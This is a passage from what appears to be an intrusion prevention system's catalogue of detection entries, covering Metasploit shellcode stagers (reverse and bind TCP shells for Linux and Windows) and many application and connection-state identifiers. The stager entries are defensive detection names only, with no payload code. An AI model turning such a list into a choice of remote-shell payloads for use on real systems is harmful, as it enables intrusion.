First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-Armle-Reverse-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-x64-Bind-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-x64-Reverse-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Bind-Nonx-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Bind-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Find-Tag

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Reverse-IPv6-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Reverse-Nonx-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-X86-Reverse-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-x64-Block-API-Gen

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-X86-Bind-Hidden-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-X86-Bind-Nonx-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-X86-Block-API-Gen

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-X86-Findtag-Ord

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Windows-x86-Reverse-TCP-Ord

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

CommTrack

About this situation: Application CommTrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CommTrack is a Commission Tracking Software. Commtrack is an add on app for QuickBooks that works on a desk top and also works in the cloud.
Back to top

Communication-Tube

About this situation: Communication Tube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-client for popular instant messaging networks
Back to top

CommunityAmerica-Credit-Union

About this situation: Application CommunityAmerica-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Community America Credit Union offers checking and savings accounts, mortgages, auto loans, home equity loans, along with financial planning and investment services.
Back to top

Commvault

About this situation: Application Commvault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Commvault's data protection and information management solutions help companies protect, access and use all of the their data, anywhere and anytime as a powerful strategic asset.
Back to top

Comodo Dragon

About this situation: Endpoint Context Agent based Comodo Dragon detection
Context: EI Correlation
Severity: 1
Tags: Uncommon Web Browsers, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Comodo Dragon Web Browser endpoint application has been detected.
Back to top

Comodo-BackUp

About this situation: Application Comodo-BackUp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ccloud is secure online storage service that provides essential disaster recovery for mission critical or otherwise important files in the event of damage, deletion or theft.
Back to top

Comodo-OCSP

About this situation: Comodo Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1769-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

Comodo-ONE

About this situation: Application Comodo-ONE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comodo One is a Complete Integrated IT Management Platform that includes other Comodo subscription based security solutions as well as third party apps, for additonal services and offerings to your customers that can be managed from the Comodo One MSP Platforms integrated interface.
Back to top

CompanyCollege

About this situation: Application CompanyCollege detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompanyCollege - online, employee training solutions.
Back to top

CompanyPond

About this situation: Application CompanyPond detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompanyPond - Reputationa Management and Brand Management for Your Company and Brand
Back to top

Compass

About this situation: Compass usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A Chinese website for stock trading and analysis
Back to top

Compass-Learning-Odyssey

About this situation: Application Compass-Learning-Odyssey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompassLearning
Back to top

CompatTelRunner

About this situation: Endpoint Context Agent based CompatTelRunner.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process CompatTelRunner.exe was detected. CompatTelRunner.exe is used for Microsoft compatibility telemetry.
Back to top

Compete

About this situation: Application Compete detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compete.com is a web traffic analysis service
Back to top

Compgun

About this situation: Application Compgun detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compgun helps sales reps and sales-comp administrators to calculate and administer sales commissions for teams.
Back to top

Compli

About this situation: Application Compli detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compli is a cloud-based solution that helps companies manage OSHA and EPA tracking and reporting online, including trainings, policies, and workflow.
Back to top

Compliance-Science---Personal-Trading-Control-Center

About this situation: Application Compliance-Science---Personal-Trading-Control-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compliance Science is technology vendor that offers web-based regulatory compliance technology and services to Investment Advisors, Broker Dealers, Dual Registrants, Hedge Funds, Fund of Funds, Private Equity Firms, Venture Capital Firms, Investment Banks, Investment Companies, and Public Companies that have a need to monitor their employees personal trading activities. Our secure, scalable solutions allow you to automate complete review of employee personal trading and code of ethics activities.
Back to top

Compliance-Software-Solutions-Corporation

About this situation: Application Compliance-Software-Solutions-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compliance Software Solutions Corporation offers environmental monitoring software products that provides to customers with the tools necessary to manage areas of control.
Back to top

Compliance-Wire

About this situation: Application Compliance-Wire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ComplianceWire organize, distribute and monitor all training and qualification activities, such as organizing users, building curricula, sending assignments and much more.
Back to top

CompliantPro

About this situation: Application CompliantPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompliantPro is a web-based compliance software system for proactively managing compliance to a variety of regulations and standards.
Back to top

Component restarted on system resource failure.

About this situation: Component restarted after system resource failure
Context: Other SMC situations
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: An SMC Component has been restarted after a fatal failure on system resource.
Back to top

Compose

About this situation: Application Compose detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compose provides instant, production ready MongoDB and Elasticsearch, automatic scaling.
Back to top

Compromised Websites

About this situation: Sites that are vulnerable and known to host an injected malicious code or unwanted content.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are vulnerable and known to host an injected malicious code or unwanted content.
Back to top

CompStudy

About this situation: Application CompStudy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompStudy is the longest running, most comprehensive survey of equity and cash compensation for top management positions and boards of directors at private companies in the technology and life sciences industries.
Back to top

Comptel

About this situation: Application Comptel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comptel Corporation is a provider of telecom business and operations software that bridges communications service providers
Back to top

CompuCal-Calibration-Solutions

About this situation: Application CompuCal-Calibration-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompuCal Calibration Solutions is an calibration software development company. It develops regulatory software solutions for manufacturing companies.
Back to top

Computer Security

About this situation: Sites that provide information about or free downloadable tools for computer security.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or free downloadable tools for computer security.
Back to top

Computer-Guidance

About this situation: Application Computer-Guidance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Computer Guidance - construction financial and accounting, construction job cost and construction project management software for commercial contractors.
Back to top

Computershare

About this situation: Application Computershare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Computershare specializes in the provision of software solutions and professional services to the securities industry and their shareholders.
Back to top

ComputerSupport

About this situation: Application ComputerSupport detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ComputerSupport - IT Support Company Providing tech support services, cloud services and on demand services to businesses across the United States.
Back to top

Compuware

About this situation: Application Compuware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Compuware Corporation is software company, include testing, development, automation and performance management software for programs running on mainframe computer systems
Back to top

CompXL

About this situation: Application CompXL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CompXL provides Website Design and Hosting solution
Back to top

comScore

About this situation: comScore usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: comScore usage was detected. comScore is a producer of web analytics and statistic collection services.
Back to top

comScore-Sitestat

About this situation: comScore Sitestat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: comScore-Sitestat usage was detected. Sitestat is a web analytics and statistics collection service.
Back to top

Concentsys

About this situation: Application Concentsys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Concentsus delivers remote data backup and online data storage solutions that are secure, reliable and affordable.
Back to top

Conceptboard

About this situation: Application Conceptboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Conceptboard is collaboration with online whiteboards and project management. Brainstorm ideas, review designs, map out processes and assign tasks.
Back to top

ConceptFeedback

About this situation: Application ConceptFeedback detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ConceptFeedback.com offers quick, actionable website feedback from a hand-selected panel of experts in design, usability, and strategy.
Back to top

Conceptshare

About this situation: ConceptShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform allows users to share files and organize reviewer feedback.
Back to top

ConcourseSuite

About this situation: ConcourseSuite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-695-5211
Description: ConcourseSuite is a Customer Relationship Management (CRM) solution. In addition it provides a web application and team collaboration ability.
Back to top

Concrete5

About this situation: Application Concrete5 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Concrete5 is an open source content management system (CMS) for publishing content on the World Wide Web and intranets.
Back to top

Concur-Expense-Management

About this situation: Concur Expense Management usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Software that automates employee spend management; Source Wikipedia
Back to top

Condeco-Software

About this situation: Application Condeco-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Condeco Software is a provider of SaaS-based office utilization and workspace scheduling solutions.
Back to top

Conductor

About this situation: Application Conductor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Conductor provides SEO platform and enterprise content marketing solutions. It offers platform offers marketing solutions, including SEO strategy, content strategy, competitive intelligence, PPC strategy, and adobe integration.
Back to top

Conduit-Mobile

About this situation: Application Conduit-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Conduit Mobile is a mobile app and customer management tools provider that integrate engagement, loyalty programs, actionable business data and insights - all in one platform.
Back to top

Conferencecalls.com

About this situation: Conferencecalls.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Conferencecalls.com is for experiencing clear calls and excellent quality on network infrastructure. Their top priority is network performance and call quality. With communication facilities located all around the world, the company is able to provide global conferencing services at a fraction of the cost. They use the industry-standard Secure Sockets Layer (SSL) technology to prevent information from being intercepted through their network.
Back to top

CONFORMiT

About this situation: Application CONFORMiT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CONFORMiT is a business solution that enables companies to reduce risks of accidents by managing lockout, permits, risks and audits.
Back to top

Conga-Composer

About this situation: Application Conga-Composer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Conga Composer makes it easy to create and deliver sophisticated documents, presentations and reports from Salesforce by automatically populating richly-formatted templates with data from any standard or custom object. Composer enables salesforce.com customers to customize, streamline and scale their document generation and reporting for unlimited use cases across all organizations and industries.
Back to top

Conject

About this situation: Application Conject detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CONJECT is a international software company, providing software solutions to manage key processes throughout the plan-build-operate life-cycle for the real estate as well as architecture, engineering and construction industries.
Back to top

Connect2Field---Job-Management-Software

About this situation: Application Connect2Field---Job-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Connect2Field allows you to schedule work to your staff and dispatch the work to their mobile device of choice. Any device can be used to access Connect2Field including iPhone, iPad, Android, Windows Phone.
Back to top

Connectandsell

About this situation: Application Connectandsell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ConnectAndSell enables you to have more conversations with your intended targets than serial dialing, either manual or technology-enabled.
Back to top

Connection_Allowed

About this situation: Connection Allowed According to Security Policy
Context: Connection Allowed
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: New connection was allowed according to the access rules
Back to top

Connection_Application-Identified

About this situation: Application was identified
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-450-4333
Description: Engine identified the application that the connection is using. This situation is detected each time the current application of the connection changes.
Back to top

Connection_Closed

About this situation: Connection Closed
Context: Connection Closed
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Connection was closed
Back to top

Connection_Closed-Abnormally

About this situation: Connection Closed Abnormally
Context: Connection Closed Abnormally
Severity: 2
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: TCP connection was closed before the TCP handshake was successfully finished.
Back to top

Connection_Deep-Inspection-Off

About this situation: Connection deep inspection is set off
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1351-5242
Last changed: sgpkg-ips-1351-5242
Description: Connection deep inspection is set off according to access rules. This situation is produced by engine versions 6.9.1 and newer.
Back to top

Connection_Discarded

About this situation: Connection Discarded According to Security Policy
Context: Connection Discarded
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: New connection was discarded according to the access rules
Back to top

Connection_Failed

About this situation: SSM Proxy connection failed.
Context: SSM Context
Severity: 1
Tags: SSM Informative Messages, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection failed.
Back to top

Connection_In-Capture-Mode

About this situation: Connection is being inspected in capture mode
Context: Engine situations
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Description: A connection is being inspected in capture mode.
Back to top

Connection_Interface_Changed

About this situation: Connection Interface Changed
Context: Connection_Interface_Changed
Severity: 1
Tags: Access
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Description: Connection interface changed
Back to top

Connection_Progress

About this situation: Connection Progress
Context: Connection_Progress
Severity: 1
Tags: Access
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection progress
Back to top

Connection_Protocol-Parameter-Error

About this situation: Error: incompatible Protocol Parameter used with features using inspection
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-554-5211
Description: Some Protocol Parameters in a Service element could not be obeyed because in this engine version they are incompatible with the advanced inspection features. The advanced inspection features include deep inspection, application identification, anti-spam, anti-virus, and URL filtering. This conflict could not be checked during policy upload because of too complex access rule interactions. See the Information Message field for the ignored protocol parameter names and values. If the need for the advanced inspection features cannot be ruled out at the beginning of a new connection, the connection is handled in a mode that enables the advanced features but precludes some conflicting protocol parameter values.
Back to top

Connection_Protocol-Parameter-Warning

About this situation: Warning: incompatible Protocol Parameter used with features using inspection
Context: Engine situations
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-554-5211
Description: Some Protocol Parameters in a Service element were ignored because in this engine version they are incompatible with the advanced inspection features. The advanced inspection features include deep inspection, application identification, anti-spam, anti-virus, and URL filtering. This conflict could not be checked during policy upload because of too complex access rule interactions. See the Information Message field for the ignored protocol parameter names and values. If the need for the advanced inspection features cannot be ruled out at the beginning of a new connection, the connection is handled in a mode that enables the advanced features but precludes some conflicting protocol parameter values.
Back to top

Connection_Queued

About this situation: Connection waiting for further processing
Context: Connection Queued
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The connection is waiting for further processing, usually authentication.
Back to top

Connection_Refused

About this situation: Connection Refused According to Security Policy
Context: Connection Refused
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: New connection was refused according to the access rules
Back to top

Connection_Rematched

About this situation: Connection Rematched and Allowed According to Security Policy
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Description: New connection was allowed according to the access rules
Back to top

Connectria

About this situation: Application Connectria detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Connectria Hosting provides cloud computing and managed hosting solutions supporting the industry's widest range of technologies.
Back to top

ConnectWise Control

About this situation: Endpoint Context Agent based ConnectWise Control detection
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: ConnectWise Control endpoint application has been detected. ConnectWise Control, formerly ScreenConnect, is a remote support, remote access and remote meeting application.
Back to top

ConnectWise-PSA

About this situation: Application ConnectWise-PSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ConnectWise is an operating system providing you with all the information you require to be successful PLUS optimal control of every aspect of your business, all in one centralized system.
Back to top

Connexcs

About this situation: Application Connexcs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Connex offers suite of cloud based tools.
Back to top

Constant-Contact

About this situation: Constant Contact usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Constant Contact, Inc. is an online marketing company offering email marketing, social media marketing, online survey, event marketing, digital storefronts, and local deals tools, primarily to small businesses, nonprofit organizations, and membership associations. Source: Wikipedia
Back to top

Contact-Management

About this situation: Application Contact-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Contact Management System combines a Client Relationship Management CRM portal with Email Marketing System, provide you tools to manage all aspects of your contact relationships, but also to send thought generating presentations, notices of new or improved items, or just educational or informational presentations you think your contacts might find interesting.
Back to top

ContactAtOnce!

About this situation: Application ContactAtOnce! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ContactAtOnce
Back to top

Contactchamp

About this situation: ContactChamp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

ContactMonkey

About this situation: Application ContactMonkey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ContactMonkey tracks your daily sales emails and brings Salesforce.com into your inbox so you be more productive.
Back to top

Contactually

About this situation: Contactually usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Contegix

About this situation: Application Contegix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Contegix is a Cloud Computing, Colocation and Managed Hosting company that delivers Go Beyond Support to global customers.
Back to top

Content Delivery Networks

About this situation: Commercial hosts that deliver content to subscribing websites.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Commercial hosts that deliver content to subscribing websites.
Back to top

Content-Grabber

About this situation: Application Content-Grabber detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Content Grabber is a software application used for web scraping and web automation. It can extract content from almost any website and save it as structured data in a format of your choice, including Excel reports, XML, CSV and most databases.
Back to top

Contentabc

About this situation: Contentabc usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: Contentabs is a hosting service provided by Swiftwill Inc.
